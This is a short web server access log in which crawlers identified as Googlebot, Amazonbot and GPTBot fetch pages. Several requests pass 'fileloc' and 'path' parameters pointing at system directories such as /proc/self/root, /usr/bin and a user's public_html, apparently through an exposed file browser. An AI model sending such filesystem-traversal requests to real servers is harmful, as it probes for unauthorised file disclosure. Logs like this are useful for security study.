66.249.65.197 - - [01/Nov/2025:08:43:32 -0400] "GET /items/1424022688.htm HTTP/1.1" 200 20106 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.200.251.20 - - [01/Nov/2025:08:43:35 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?fileloc=//lib64/python2.7/lib-tk/Canvas.pyc&path=//lib64/python2.7/lib-tk HTTP/1.1" 200 2963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:43:37 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/composer/bin HTTP/1.1" 200 2840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:43:38 -0400] "GET /items/1424031881.htm HTTP/1.1" 200 19597 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.59 - - [01/Nov/2025:08:43:39 -0400] "GET /q-~284dfR1d7mfyHeAUDsScKtYNzAjMRbDQo19503/?fileloc=/home/creaqbdc/public_html/class-.php&path=/home/creaqbdc/public_html HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.250.48 - - [01/Nov/2025:08:43:39 -0400] "GET /beste-versorger-provision/?fileloc=//proc/self/root/proc/self/root/bin/rev&path=//proc/self/root/proc/self/root/bin HTTP/1.1" 200 2979 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.204.150.196 - - [01/Nov/2025:08:43:43 -0400] "GET /portfolio-commercial/?fileloc=//usr/bin/pod2html&path=//usr/bin HTTP/1.1" 200 4632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:43:45 -0400] "GET /items/1423579844.htm HTTP/1.1" 200 18685 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:43:45 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv HTTP/1.1" 200 3028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
